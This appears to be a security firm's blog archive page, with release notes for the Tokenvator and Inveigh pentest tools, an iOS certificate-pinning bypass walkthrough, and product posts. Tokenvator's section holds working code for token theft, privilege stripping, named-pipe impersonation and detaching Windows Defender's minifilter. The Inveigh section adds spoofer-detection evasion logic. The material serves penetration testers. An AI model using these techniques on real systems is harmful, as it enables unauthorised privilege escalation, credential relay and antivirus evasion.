What's Next and New with NetSPI Resolve

Here at NetSPI, we see firsthand the struggles enterprises face to fix vulnerabilities. It’s concerning when our pentesters and customers continue to find the same vulnerabilities that have yet to be remediated – at the same client, year after year.

The struggle faced by enterprises in managing vulnerabilities is not limited to manual penetration testing results. Scanners find millions of vulnerabilities in our customer environments, and we see the sheer volume overwhelming their remediation efforts. Even if 99% of assets can be fixed within a reasonable time frame, a dangerous window of opportunity persists if the last 1% lingers.

We’re taking action to help our customers solve this challenge. Fortunately, we have a solid foundation from which to tackle the problem.

Our penetration testing platform, NetSPI Resolve 6, was built to manage our own penetration testing process. The Resolve software platform has given NetSPI a competitive edge in pentesting by allowing our pentesters to spend more time on testing and less time on overhead tasks.

Resolve works by:

  1. Ingesting vulnerabilities from any source: scanners and manual pentesting reports
  2. Normalizing the definition of the vulnerabilities to a standard rubric
  3. Correlating the vulnerabilities to de-duplicate and compress the findings (steps 2 and 3 are sketched in code below)
  4. Automatically generating reports
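
To make steps 2 and 3 concrete, here is a minimal sketch of how normalization and correlation can work. This is an illustration only – not Resolve’s actual implementation – and the field names are hypothetical:

def correlate(findings, rubric):
    # findings: vulnerability dicts from scanners and pentest reports (hypothetical schema)
    # rubric: maps source-specific names onto a standard vulnerability definition
    deduped = {}
    for f in findings:
        name = rubric.get(f["name"], f["name"])   # step 2: normalize to the rubric
        key = (f["asset"], name)                  # step 3: correlate duplicates
        entry = deduped.setdefault(key, {"asset": f["asset"], "name": name, "sources": set()})
        entry["sources"].add(f["source"])         # remember every tool that reported it
    return list(deduped.values())                 # step 4 reports on the compressed list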

Customers have approached us about whether they could use Resolve in their own environments to help them conquer their challenges. We agreed. Since that time, we’ve licensed the Resolve platform to the benefit of many organizations, especially those with their own pentesters.

Now we’re taking the next step. You see, Resolve wasn’t built for vulnerability management and orchestration, which is the key need facing the majority of our customers.

So we’re building on the features of Resolve 6 that NetSPI uses to manage pentesting and expanding the platform to serve the larger vulnerability management and orchestration market. For the past year, we’ve been rebuilding the Resolve platform for the next generation: Resolve 7.

Resolve 7 will be a service-oriented architecture that scales to the massive data needs of our customers. It will be web-based, using a virtual appliance for easy deployment. We are adding more administration features, such as field-level role-based access control (RBAC) permissions, granular security groups, and single sign-on (SSO) support, to make the platform enterprise-ready out of the box. We’ve added a vulnerability orchestration component with an integration engine to complement the powerful vulnerability correlation engine. And we’re building a new user interface with expanded capabilities for reporting and business intelligence visualizations.

We’re building Resolve 7 for you – so you can help stem the tide of your vulnerability flood. We’ll showcase new features of Resolve in coming posts, so stay tuned.

Contact us for more information about the availability of NetSPI Resolve 7.0.

Tokenvator: Release 2

What is Tokenvator?

Tokenvator is a token manipulation utility that is primarily used to alter the privileges of a process. In the original release we primarily focused on elevating process privileges. In this release, in addition to the usual bug fixes and improving existing features, I added several new features:

  • The ability to display additional token information
  • A help command that’s actually useful
  • Disabling and Removing Token Privileges
  • Named Pipe Tokens
  • Minifilter Manipulation

Use Cases:

There are a multitude of instances where elevating privileges or duplicating another process’s token is necessary to proceed on an assessment. Most credential theft mechanisms require SYSTEM privileges, and sometimes even an impersonated SYSTEM token is not enough. Tokenvator now not only impersonates tokens, but also tries to start processes with a primary token, as sketched below.
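
To illustrate the difference, here is a rough Python ctypes sketch of the underlying Win32 calls – DuplicateTokenEx to convert an impersonation token into a primary token, then CreateProcessWithTokenW to launch a process with it. Tokenvator itself is written in C#, so treat this as an approximation of the technique rather than the tool’s code:

import ctypes
from ctypes import wintypes

advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)

class STARTUPINFO(ctypes.Structure):
    _fields_ = [
        ("cb", wintypes.DWORD), ("lpReserved", wintypes.LPWSTR),
        ("lpDesktop", wintypes.LPWSTR), ("lpTitle", wintypes.LPWSTR),
        ("dwX", wintypes.DWORD), ("dwY", wintypes.DWORD),
        ("dwXSize", wintypes.DWORD), ("dwYSize", wintypes.DWORD),
        ("dwXCountChars", wintypes.DWORD), ("dwYCountChars", wintypes.DWORD),
        ("dwFillAttribute", wintypes.DWORD), ("dwFlags", wintypes.DWORD),
        ("wShowWindow", wintypes.WORD), ("cbReserved2", wintypes.WORD),
        ("lpReserved2", ctypes.c_void_p), ("hStdInput", wintypes.HANDLE),
        ("hStdOutput", wintypes.HANDLE), ("hStdError", wintypes.HANDLE),
    ]

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("hProcess", wintypes.HANDLE), ("hThread", wintypes.HANDLE),
        ("dwProcessId", wintypes.DWORD), ("dwThreadId", wintypes.DWORD),
    ]

MAXIMUM_ALLOWED = 0x02000000
SECURITY_IMPERSONATION, TOKEN_PRIMARY = 2, 1   # enum values
CREATE_NEW_CONSOLE = 0x00000010

def spawn_with_primary_token(h_token, command="cmd.exe"):
    # convert the (impersonation) token into a primary token
    primary = wintypes.HANDLE()
    advapi32.DuplicateTokenEx(h_token, MAXIMUM_ALLOWED, None,
                              SECURITY_IMPERSONATION, TOKEN_PRIMARY,
                              ctypes.byref(primary))
    # launch a new process that fully owns the duplicated token
    si, pi = STARTUPINFO(), PROCESS_INFORMATION()
    si.cb = ctypes.sizeof(si)
    cmd = ctypes.create_unicode_buffer(command)   # lpCommandLine must be writable
    advapi32.CreateProcessWithTokenW(primary, 0, None, cmd,
                                     CREATE_NEW_CONSOLE, None, None,
                                     ctypes.byref(si), ctypes.byref(pi))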

Displaying Token Information:

It can be useful to know some limited information about a token. Just because you’re impersonating a token doesn’t mean you inherit all the privileges of that token – not all SYSTEM tokens are created or impersonated identically.

In the example below we are operating as SYSTEM but are still in our original groups.

However, in the second example below, we got SYSTEM via the GetSystem command; we are operating as SYSTEM and have been placed in the relevant groups for SYSTEM.

In this final example we got SYSTEM via the command GetSystem cmd.exe which used the same token to start a new process.

Help Command Changes

In the first release, the help command left a lot to be desired. When the author of the tool can’t remember how to run a command and the help menu doesn’t help him… there might be a problem. So some changes were made to provide additional help for each supported method. Below is an example.

Token Privilege Modifications:

In the previous release it was possible to enable a privilege on a process. In this example we are enabling SeSystemEnvironmentPrivilege on LogonUI.

That’s neat, but what if we wanted to remove privileges from a process?

Tokenvator now supports disabling or deleting a privilege placed on a process. In this instance we first disable and then remove the SeDebugPrivilege from the PowerShell 6 process (pwsh.exe).
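
Under the hood this boils down to AdjustTokenPrivileges: an attribute value of 0 disables a privilege, while SE_PRIVILEGE_REMOVED deletes it from the token outright. Below is a minimal Python ctypes sketch of the call sequence – again an approximation, not the C# tool’s code:

import ctypes
from ctypes import wintypes

advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

PROCESS_QUERY_INFORMATION = 0x0400
TOKEN_ADJUST_PRIVILEGES   = 0x0020
TOKEN_QUERY               = 0x0008
SE_PRIVILEGE_REMOVED      = 0x00000004   # an attribute of 0 merely disables

class LUID(ctypes.Structure):
    _fields_ = [("LowPart", wintypes.DWORD), ("HighPart", wintypes.LONG)]

class LUID_AND_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("Luid", LUID), ("Attributes", wintypes.DWORD)]

class TOKEN_PRIVILEGES(ctypes.Structure):
    _fields_ = [("PrivilegeCount", wintypes.DWORD),
                ("Privileges", LUID_AND_ATTRIBUTES * 1)]

def adjust_privilege(pid, privilege, attributes):
    # opening another process's token generally requires SeDebugPrivilege
    h_proc = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    h_token = wintypes.HANDLE()
    advapi32.OpenProcessToken(h_proc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                              ctypes.byref(h_token))
    luid = LUID()
    advapi32.LookupPrivilegeValueW(None, privilege, ctypes.byref(luid))
    tp = TOKEN_PRIVILEGES(1, (LUID_AND_ATTRIBUTES * 1)(
        LUID_AND_ATTRIBUTES(luid, attributes)))
    advapi32.AdjustTokenPrivileges(h_token, False, ctypes.byref(tp), 0, None, None)

# adjust_privilege(pid, "SeDebugPrivilege", 0)                     # disable
# adjust_privilege(pid, "SeDebugPrivilege", SE_PRIVILEGE_REMOVED)  # remove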

But what if we really don’t want a process to have any privileges on a system? That is possible as well. In this example we remove all the privileges held by the splunkd process token. My intent is not to pick on Splunk; splunkd was just the first thing in my lab that met the example criteria. 😉

Named Pipe Tokens

There are instances where we don’t have the SeDebugPrivilege and thus cannot open a process we do not own. In these instances, we need a different method to GetSystem. This is where named pipes come into play. Via the Windows APIs we have the native ability to impersonate anyone who connects to our named pipe.
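
For anyone curious, here is a bare-bones Python ctypes sketch of the server side of this trick: create the pipe, wait for a connection, read at least one byte, then impersonate the client. The pipe name is arbitrary, and the real tool is C#:

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
kernel32.CreateNamedPipeW.restype = wintypes.HANDLE

PIPE_ACCESS_DUPLEX = 0x00000003
PIPE_TYPE_BYTE = 0x00000000

# create a pipe with a name the target service (or GetSystem trigger) will open
pipe = kernel32.CreateNamedPipeW(r"\\.\pipe\demo", PIPE_ACCESS_DUPLEX,
                                 PIPE_TYPE_BYTE, 1, 0, 0, 0, None)
kernel32.ConnectNamedPipe(pipe, None)             # block until a client connects

buf = ctypes.create_string_buffer(1024)
read = wintypes.DWORD()
kernel32.ReadFile(pipe, buf, 1024, ctypes.byref(read), None)   # must read before impersonating

advapi32.ImpersonateNamedPipeClient(pipe)         # calling thread now holds the client's token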

This can be useful in other situations where services connect to a known named pipe name. In these instances, we can create an arbitrary named pipe and steal the remote process’s token as soon as it connects and writes to our pipe. For processes that use named pipes for inter-process communication, this opens up a potential attack surface.

Minifilters:

Many defensive products use hooks to intercept calls to check for malicious activity. Microsoft has strongly suggested that when it comes to the file system, vendors do not hook calls but instead use Minifilters, which are passed the file system data. AV / EDR products are given a specified altitude, or precedence, at which they inspect files. This altitude-based design also makes them trivial to identify.

Below are the Minifilters associated with Windows Defender and vShield.

DeviceMup is the Minifilter associated with UNC paths. To detach the filter monitoring network paths, we can run a simple command. Note: not all Minifilters can be detached, however many, many can be. This is because not all filters are programmed with an unload routine, and without one a Minifilter cannot gracefully unload.
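
For reference, the detach can be approximated in a couple of lines through fltlib.dll’s documented FilterDetach call. The filter and volume names below are examples, and administrative privileges are required:

import ctypes

fltlib = ctypes.WinDLL("fltlib")
fltlib.FilterDetach.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_wchar_p]

# detach Windows Defender's minifilter instance from the C: volume (run as admin)
hr = fltlib.FilterDetach("WdFilter", "C:", None)   # returns S_OK (0) on success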

In the following demo we are going to be detaching a Minifilter from a file system so that we can run our tool while the AV product is still running.

If you’re looking for a more permanent way to disable Minifilters, I would suggest looking at this registry key.

So that’s all for this release. Thank you to everyone who took the time to file bug reports and let me know how they were using the tool. And a special thank you to those who submitted pull requests for this release. If you have any suggestions or feature requests, please feel free to let me know.

Inveigh – What's New in Version 1.4

Ugh, I can’t believe it’s been a year and a half since the last release of Inveigh. I had intended to complete a new version back in March. At that time, my goals were to perform some refactoring, incorporate dynamic DNS updates, and add the ability to work with shares through NTLM challenge/response relay. In the end, the refactoring is really the only thing that went as planned. Oh well, September isn’t really all that far past March, right?

Wait, what’s an Inveigh?

If you aren’t familiar with Inveigh, here’s how I describe it on the wiki:

“Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh also contains HTTP/HTTPS/Proxy listeners for capturing incoming authentication requests and performing attacks. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process.”

I often hear people simply say, “Inveigh is the PowerShell version of Responder.” This always makes me mumble to myself about packet sniffing and other design differences that are probably meaningless to most. Regardless of how Inveigh is described though, if you have used Responder, Inveigh’s functionality will be easy to understand. The main difference is that where Responder is the go-to tool for performing LLMNR/NBNS spoofing attacks, Inveigh is geared more toward PowerShell-based Windows post-exploitation use cases.

What’s new in Inveigh 1.4

In this blog post, I’ll go through the following major additions and details related to Inveigh 1.4:

Invoke-Inveigh Additions

Invoke-Inveigh is the main LLMNR, mDNS, and NBNS spoofing module.

ADIDNS Attacks

For a detailed explanation of ADIDNS attack techniques, see my blog post on the subject.

Inveigh now contains the following two optional ADIDNS attacks:

  • Wildcard – Inveigh will add a wildcard record to ADIDNS at startup.

  • Combo – Inveigh keeps track of LLMNR/NBNS name requests. If the module sees the same request from a specified number of different systems, a matching record will be added to ADIDNS.

Inveigh’s automated approach may not always be the best way to perform ADIDNS attacks; for manual options, see my Powermad project.

Note, the ADIDNS attacks ended up replacing and extending the role I had originally planned for dynamic DNS updates. I removed the dynamic DNS update code that existed in some of the early 1.4 dev versions.

Additional Detection Evasion Options

There are lots of tools designed to detect LLMNR and/or NBNS spoofers. Last year at DerbyCon, Beau Bullock, Brian Fehrman, and Derek Banks released CredDefense. This toolkit contains a spoofer detection tool named ResponderGuard. This tool can send requests directly to a host IP address rather than the traditional multicast/broadcast addresses. This technique has the added benefit of allowing detection across subnet boundaries. Inveigh can now detect and ignore these types of requests in order to help avoid detection.

I’ve also been noticing that endpoint protection products are leveraging agents to detect LLMNR/NBNS spoofers. If you see lots of random requests originating from each workstation, this detection technique is potentially in use. The ideal evasion technique is to watch the request traffic and pick out specific, potentially safe names to spoof. However, in an attempt to automate evading this type of detection, I’ve added the option to prevent Inveigh from responding to specific name requests unless they have been seen a specified number of times and/or from a specified number of different hosts. This should help weed out the randoms at the cost of skipping less frequent legitimate requests.
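
The gist of that logic is simple enough to sketch in a few lines of Python; the threshold and data structure below are illustrative, not Inveigh’s actual parameter names:

from collections import defaultdict

requests_seen = defaultdict(set)    # requested name -> set of requesting hosts
HOST_THRESHOLD = 3                  # example knob: distinct hosts required before spoofing

def should_respond(name, source_ip):
    requests_seen[name].add(source_ip)
    # ignore a name until enough different systems have asked for it, which
    # weeds out the random one-off probes that detection agents generate
    return len(requests_seen[name]) >= HOST_THRESHOLD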

Invoke-InveighRelay Additions

Invoke-InveighRelay is the HTTP, HTTPS, and Proxy to SMB relay module. I may have gotten a little carried away with the additions to this module for just a single release. The file share functionality led to maintaining authenticated SMB sessions, which begged for more targets, which inspired target enumeration (thanks Scott!), which reminded me of BloodHound, and now it’s September.

Relay Attacks

The new version contains the following three SMB2.1 compatible attacks:

  • Enumerate – The enumerate attack can perform Group, User, Share, and NetSession enumeration against a target.
  • Execute – Performs PSExec style command execution. In previous versions of Inveigh Relay, this was the only available attack. Note, I removed SMB1 support.
  • Session – Inveigh Relay can now establish and maintain privileged/unprivileged authenticated SMB sessions. The sessions can be accessed with Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec from my Invoke-TheHash project. Inveigh Relay will attempt to keep the sessions open as long as the module is running.

Inveigh Relay will accept any combination of the three attacks chained together.

Disclaimer, I didn’t originally design the Invoke-TheHash SMB tools with this type of usage in mind. I will likely need to at least beef up the SMB error handling.

Multiple Target Handling

Previously, Inveigh Relay could only target a single system. With the addition of the session attack, I thought it made sense to add the capability to target multiple systems without restarting the module. My initial implementation attempts focused on simply identifying valid targets and preventing things like unnecessarily performing the same source/destination relays over and over.

Later, after I created Invoke-SMBEnum for performing enumeration tasks, I started thinking that it would be useful to incorporate the enumeration code directly into Inveigh Relay. This would allow me to leverage the results, combined with incoming user session information obtained through relay, for making targeting decisions. Basically, the module would gather as much information about the environment as possible through unprivileged user relays and attempt to use that information to find relay source/target combinations that will provide privilege or access to file shares.

Inveigh Relay stores the following target information in memory, most of which is used for targeting decisions:

  • IP – Target’s current IP address.
  • Hostname – Target’s hostname.
  • DNS Domain – Target’s AD domain in DNS format.
  • NetBIOS Domain – Target’s AD domain in NetBIOS format.
  • Sessions – Target’s identified user sessions.
  • Administrators Users – Local Administrators group, user members.
  • Administrators Groups – Local Administrators group, group members.
  • Privileged – Users with command execution privilege on the target.
  • Shares – Target’s custom shares, if any.
  • NetSessions – Target’s NetSessions minus the NetSessions generated through the relay process.
  • NetSession Mapped – User sessions discovered through enumerating NetSessions on other targets.
  • Local Users – Target’s local users.
  • SMB2.1 – Status of SMB2.1 support on the target.
  • Signing – Status of SMB signing requirements on the target.
  • SMB Server – Whether or not SMB is running and accessible on the target.
  • DNS Record – Whether or not a DNS record was found if a lookup was performed.
  • IPv6 Only – Whether or not the host is IPv6 only.
  • Targeted – Timestamp for when the target was last targeted.
  • Enumerate – Timestamp for when the target was last enumerated with the ‘Enumerate’ attack.
  • Execute – Timestamp for the last time command execution was performed through the ‘Execute’ attack on the target.

One quick note regarding unprivileged system enumeration. You will likely encounter more and more systems that do not allow some forms of unprivileged enumeration. See this post from Microsoft for more details.

So far, Inveigh Relay uses the following priority list to select a target (a code sketch follows the list):

  1. Local Administrators Group (User Members) – The module will look up previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will search for matches in the target pool’s enumerated local Administrators groups.
  2. Local Administrators Group (Nested Group Members) – The module will look up previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will attempt to identify AD group membership for the sessions. Finally, the module will search for group matches in the target pool’s enumerated local Administrators groups. Note, Inveigh Relay alone does not have the ability to enumerate Active Directory (AD) group membership.
  3. NetSessions – The module will get the IP address of an incoming connection. Next, Inveigh Relay will search for matches within the target pool’s NetSessions. For example, if an incoming connection originates from ‘192.168.1.100’, any system with a NetSession that contains ‘192.168.1.100’ is a potential target.
  4. Custom Shares – The module will target systems that host custom shares (not defaults like C$, IPC$, etc.) that may be worth browsing with multiple users.
  5. Random – The module will optionally select a random target in the event an eligible target has not been found through the above steps. Inveigh Relay will apply logic to prioritize and exclude targets from within the random target pool.
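
Expressed as code, the selection logic looks roughly like the following Python sketch. Inveigh itself is PowerShell, and the field names below mirror the in-memory target data listed earlier rather than the module’s real variables:

import random

def select_target(conn, targets):
    # conn: incoming connection info, e.g. {"user": "...", "groups": set(), "ip": "..."}
    # targets: list of dicts with admin_users, admin_groups, netsessions,
    # shares, smb_server, and signing fields (all hypothetical names)
    for t in targets:                                    # 1. session user is a local admin
        if conn["user"] in t["admin_users"]:
            return t
    for t in targets:                                    # 2. admin through an AD group
        if conn["groups"] & set(t["admin_groups"]):
            return t
    for t in targets:                                    # 3. NetSession source IP match
        if conn["ip"] in t["netsessions"]:
            return t
    for t in targets:                                    # 4. hosts with custom shares
        if t["shares"]:
            return t
    eligible = [t for t in targets                       # 5. optional random fallback
                if t["smb_server"] and not t["signing"]]
    return random.choice(eligible) if eligible else None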

BloodHound Integration

Once I started putting together targeting based on enumeration, I was of course reminded of the awesome BloodHound project. Since I consider Inveigh’s default state to be running from a compromised AD system, access to AD has usually already been achieved. With AD access, BloodHound can gather most of the same information as Inveigh Relay’s Enumerate attack with the bonus of having visibility into AD group membership.

When using imported BloodHound data, think of Inveigh Relay as one degree of local privilege whereas BloodHound is six degrees of domain admin. Inveigh Relay does not have full BloodHound path visibility. It is still a good idea to identify and specify relay targets which will grant the access required for the engagement goals.

Second disclaimer, I’ve mostly just tested targeting through BloodHound data in my lab environments. There are probably plenty of scenarios that can throw off the targeting, especially with large environments. I’ll continue to make adjustments to the targeting.

ConvertTo-Inveigh

ConvertTo-Inveigh is a new support function capable of importing BloodHound’s groups, computers, and sessions JSON files into memory.

Project Links

Here are links to all of the projects mentioned in this blog post:

Inveigh: https://github.com/Kevin-Robertson/Inveigh

Invoke-TheHash: https://github.com/Kevin-Robertson/Invoke-TheHash

Powermad: https://github.com/Kevin-Robertson/Powermad

BloodHound: https://github.com/BloodHoundAD/BloodHound

Responder: https://github.com/lgandx/Responder

CredDefense Toolkit: https://github.com/CredDefense/CredDefense

What’s next for Inveigh?

For this version, I need to update the wiki, perform lots of targeting tweaks, and fix bugs. After that, I’m not entirely sure. There is certainly more to explore with BloodHound integration such as exporting session information collected through Inveigh. I’d also like to revisit my original unreleased C# PoC version of Inveigh. As for today though, I’m just happy to have finally escaped my dev branch.

Questions?

If you have any questions, reach out to me @kevin_robertson on Twitter or the amazingly helpful BloodHound Gang slack. Also, feel free to say hi if you see me wandering around DerbyCon!

Four Ways to Bypass iOS SSL Verification and Certificate Pinning

A couple months ago, Cody Wass released a blog on how to bypass SSL verification and certificate pinning for Android. I thought it would be a great idea to write up some techniques that I’ve found to work well for iOS. To reiterate from Cody’s blog, being able to perform man-in-the-middle (MITM) attacks is a crucial part of any standard penetration test. This allows us to intercept and fuzz all HTTP requests and find security vulnerabilities. In the examples below, I will be using Burp Suite as my web proxy. This blog assumes that the reader is somewhat familiar with iOS, Xcode, and setting up their phone and Burp to intercept mobile HTTP traffic. In this blog I’ll cover the following four techniques to bypass SSL verification and certificate pinning in iOS:

  • Installing your own CA
  • Installing Software to iOS Device
  • Using Objection and Frida
  • Using disassemblers to modify the IPA file

Technique 1 – Installing Your Own CA

Installing your own CA is the first step to getting rid of SSL errors, and it is relatively easy in iOS. First, configure your mobile device and web proxy to be able to intercept web traffic. Next, get the CA onto the device; this can be done by opening an email attachment or downloading the certificate. Specifically, for Burp Suite, you can simply browse to https://burp and click on “CA Certificate”.

Next you will be prompted to “Install” the certificate as seen below.

Clicking on install prompts a warning that the certificate you are going to install will be added to the list of trusted certificates.

You can verify that the certificate is installed by going into Settings > General > Profile. In iOS 10.3 and later, you will need to manually trust the installed certificate by going to Settings > General > About > Certificate Trust Settings and enabling trust for that certificate.

Technique 2 – Installing Software to iOS Device

If you’re still getting SSL errors, or the application itself dies waiting for a connection, there is a chance the application is using some sort of TLS chain validation or SSL certificate pinning. The simplest method to bypass SSL certificate pinning is to install software that does all the hard work for us. The tools listed below are easy to set up and get running.

Installation instructions are listed on each of the webpages. However, with these methods, a jailbroken iOS device is required. In recent years, keeping a jailbroken device on the current iOS version has become increasingly difficult.

Technique 3 – Using Objection and Frida

Another proven method is to use Frida hooks and Objection. At a very high level, Frida is a framework that allows you to interfere with an application’s code at runtime – in this case, with the logic behind certificate validation. Ordinarily this requires a jailbroken device. However, we can use the Frida Gadget, which offers the full arsenal of the framework without requiring a jailbroken device. Even more good news: Objection is a wrapper around this framework and will do all the hard work for us!

First off, you will need a valid provisioning profile and a code-signing certificate from an Apple Developer account. You can create a valid provisioning profile by creating a test application within Xcode, and you can register for a free developer account here.

Once the test project is created, the next step is to set up the code-signing certificate. First, open Xcode preferences and select “Accounts”. To add your Apple ID account, click on the plus sign in the lower left-hand corner and sign into your account. Next click on “Manage Certificates” in the lower right-hand corner.

Clicking on that button brings us to the screen below. To create a certificate, click on the plus sign in the lower left-hand box and select “iOS Development”. Once that loads, click “Done” and then “Download Manual Profiles”, which loads the certificate onto the computer.

Once you have the code-signing certificate loaded onto your computer, you can find it by running the following command:

NetSPIs-MacBook-Pro:Test netspi$ security find-identity

Policy: X.509 Basic
Matching identities
1) A[REDACTED]1 "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2) 0[REDACTED]C "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2 identities found

Valid identities only
1) A[REDACTED]1 "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2) 0[REDACTED]C "iPhone Developer: [REDACTED]@netspi.com ([REDACTED])"
2 valid identities found

We want to load the Frida Gadget dynamic library to be able to modify the application at runtime. In the context of an iOS application, we want to extract the IPA file, modify the binary to load FridaGadget.dylib, code-sign the binary and dylib, then repackage the updated IPA file. As mentioned previously, we can use Objection to do all of this work automatically. This is done with the simple command below, where -s is the IPA file and -c is the code-signing certificate.

NetSPIs-MacBook-Pro:NetSPI netspi$ objection patchipa -s netspi_test.ipa -c 0[REDACTED]C
Using latest Github gadget version: 12.0.3
Remote FridaGadget version is v12.0.3, local is v12.0.1. Downloading...
Downloading from: https://github.com/frida/frida/releases/download/12.0.3/frida-gadget-12.0.3-ios-universal.dylib.xz
Downloading iOS dylib to /Users/netspi/.objection/ios/FridaGadget.dylib.xz...
Unpacking /Users/netspi/.objection/ios/FridaGadget.dylib.xz...
Cleaning up downloaded archives...
Patcher will be using Gadget version: 12.0.3
No provision file specified, searching for one...
Found provision file /Users/netspi/Library/Developer/Xcode/DerivedData/test-fbleootdcdwdyafhyzjmvihvfiga/Build/Products/Debug-iphoneos/test.app/embedded.mobileprovision expiring in 307 days, 1:40:03.015176
Found a valid provisioning profile
Working with app: NetSPI.app
Bundle identifier is: com.netspi.test
Codesigning 13 .dylib's with signature 0[REDACTED]C
Code signing: libswiftDarwin.dylib
Code signing: libswiftUIKit.dylib
Code signing: libswiftCoreImage.dylib
Code signing: libswiftos.dylib
Code signing: libswiftObjectiveC.dylib
Code signing: libswiftCoreGraphics.dylib
Code signing: FridaGadget.dylib
Code signing: libswiftCore.dylib
Code signing: libswiftCoreFoundation.dylib
Code signing: libswiftMetal.dylib
Code signing: libswiftQuartzCore.dylib
Code signing: libswiftFoundation.dylib
Code signing: libswiftDispatch.dylib
Creating new archive with patched contents...
Codesigning patched IPA...
Cannot find entitlements in binary. Using defaults

Copying final ipa from /var/folders/1k/mw7w1kfd4c96jkvkw5mp3qfm0000gn/T/netspi_test-frida-codesigned.ipa to current directory...
Cleaning up temp files...

Once the command has finished running, we have a new IPA file called netspi_test-frida-codesigned.ipa, which we can then deploy to the iOS device. There is a handy tool called ios-deploy which can work with non-jailbroken iOS devices. There are several different options you can use depending on what you want to accomplish (e.g., run a debugger, deploy an app over USB, etc.).

To use ios-deploy, unzip the IPA file and run the ios-deploy command. In the example below, I specified that I want to deploy the application over USB (-W) and the bundle I want to deploy (-b).

NetSPIs-MacBook-Pro:NetSPI netspi$ ios-deploy -W -b ./Payload/NetSPI.app
[....] Waiting for iOS device to be connected
[....] Using 3ff9c90d2b23beadeefdf7bc240211730c84adef (P105AP, iPad mini, iphoneos, armv7) a.k.a. 'MAPen's iPad'.
------ Install phase ------
[ 0%] Found 3ff9c90d2b23beadeefdf7bc240211730c84adef (P105AP, iPad mini, iphoneos, armv7) a.k.a. 'MAPen's iPad' connected through USB, beginning install
[ 5%] Copying /Users/netspi/test/NetSPI/Payload/NetSPI.app/META-INF/ to device
[TRUNCATED]
[ 52%] CreatingStagingDirectory
[ 57%] ExtractingPackage
[ 60%] InspectingPackage
[ 60%] TakingInstallLock
[ 65%] PreflightingApplication
[ 65%] InstallingEmbeddedProfile
[ 70%] VerifyingApplication
[ 75%] CreatingContainer
[ 80%] InstallingApplication
[ 85%] PostflightingApplication
[ 90%] SandboxingApplication
[ 95%] GeneratingApplicationMap
[100%] Installed package ./Payload/NetSPI.app

Now that we have the app installed on our iOS device, the next step is to open the application and connect to it via Objection.

NetSPIs-MacBook-Pro:NetSPI netspi$ objection explore
_ _ _ _
___| |_ |_|___ ___| |_|_|___ ___
| . | . | | | -_| _| _| | . | |
|___|___|_| |___|___|_| |_|___|_|_|
|___|(object)inject(ion) v1.3.0

Runtime Mobile Exploration
by: @leonjza from @sensepost

[tab] for command suggestions
com.netspi.test on (iPad: 9.0.1) [usb] #

Now all that is left is to run the built-in command that bypasses certificate validation, and you can begin proxying traffic.

com.netspi.test on (iPad: 9.0.1) [usb] # ios sslpinning disable
Job: b748974e-ed6d-4aaf-b5ea-3fb35a13720a - Starting
[3fb35a13720a] [ios-ssl-pinning-bypass] [NSURLSession] Found 1 matches for URLSession:didReceiveChallenge:completionHandler:
[3fb35a13720a] [ios-ssl-pinning-bypass] [NSURLConnection] Found 5 matches for connection:willSendRequestForAuthenticationChallenge:
[3fb35a13720a] [ios-ssl-pinning-bypass] Hooking lower level method: SSLSetSessionOption
[3fb35a13720a] [ios-ssl-pinning-bypass] Hooking lower level method: SSLCreateContext
[3fb35a13720a] [ios-ssl-pinning-bypass] Hooking lower level method: SSLHandshake
Job: b748974e-ed6d-4aaf-b5ea-3fb35a13720a - Started

Technique 4 – Using Disassemblers to Modify the IPA File

If the above techniques fail, or you would like to try something more difficult, there is always the option of using a disassembler to modify the IPA file and bypass any certificate validation. Disassembling an iOS application is out of scope for this blog, but some of the more common disassemblers are Hopper and IDA. Once the binary has been loaded into the disassembler, following the logic behind the functions called when the mobile application attempts to make an SSL connection with the application server can point you toward where the certificate pinning takes place. Modifying the IPA will most likely break the application’s signature, so the app cannot be installed on an iOS device until the IPA file is re-signed.

Conclusion

Being able to view and modify HTTP requests sent to the server from the mobile application is an essential part of any penetration test. It gives us testers an inside view of how application functionality works. The methods described in this blog are the ones we use during our assessments to view and manipulate traffic when presented with SSL certificate errors and pinning. If you have any questions or have techniques that work for you, comment below!

* Edit 10/18/18: Added additional step to technique 1 for iOS 10.3 and later.

How to Streamline Pentest Data to Security Orchestration

Previously, we discussed best practices for tracking vulnerability data through to remediation. In this post, we explore the challenge of streamlining human penetration testing (pentesting) data into the vulnerability orchestration process. We provide three best practices you can use when engaging a third-party pentesting company to ensure the pentesting data is delivered in a way that is compatible with your security orchestration process.

Pentesting is an essential threat and vulnerability management process used to discover some of the most important vulnerabilities in your environment. Human pentesters find vulnerabilities that scanners can’t catch, but an attacker will find. The challenge often becomes how to track and remediate those vulnerabilities after the test is complete.

Two Challenges of Pentesting Data for Security Orchestration

Vulnerability scanners use known data formats that don’t change often, which makes their output easy to incorporate into security orchestration tools. Once you’ve integrated your scan results into a vulnerability orchestration process and normalized them, you have some confidence that the process will continue to work as designed. In comparison, pentesters often do not follow a known data format and may add information to the report beyond the specific findings.

Findings from third-party penetration testing companies often arrive as a static report in PDF format. This format makes it difficult to streamline those results in an automated way when you expect a standard input. Some reports may come with a CSV file of the findings, which provides a more structured data format, but correlating those findings with existing vulnerabilities may require manual review.

